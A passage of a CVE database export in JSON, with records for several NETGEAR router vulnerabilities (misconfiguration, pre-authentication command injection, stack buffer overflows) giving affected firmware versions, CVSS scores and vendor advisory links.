}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18752",
"datePublished": "2020-04-22T16:15:33",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:42.893Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18799
Vulnerability from cvelistv5
Published
2020-04-21 18:33
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.895Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-21T18:33:45",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18799",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18799",
"datePublished": "2020-04-21T18:33:45",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.895Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21231
Vulnerability from cvelistv5
Published
2020-04-24 14:22
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1.78, JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:39.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1.78, JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-24T14:22:48",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21231",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1.78, JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21231",
"datePublished": "2020-04-24T14:22:48",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:39.563Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21162
Vulnerability from cvelistv5
Published
2020-04-23 20:16
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:38.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-06-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T20:16:47",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21162",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000059147/Security-Advisory-for-Pre-Authentication-Command-Injection-on-Some-Gateways-Routers-and-Extenders-PSV-2016-0074"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21162",
"datePublished": "2020-04-23T20:16:47",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:38.164Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21093
Vulnerability from cvelistv5
Published
2020-04-27 14:41
Modified
2024-08-05 12:19
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:19:27.643Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-27T14:41:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21093",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060456/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Wireless-Extenders-and-Orbi-Satellites-PSV-2017-2011"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21093",
"datePublished": "2020-04-27T14:41:02",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:19:27.643Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20700
Vulnerability from cvelistv5
Published
2020-04-16 14:37
Modified
2024-08-05 02:46
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:46:10.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
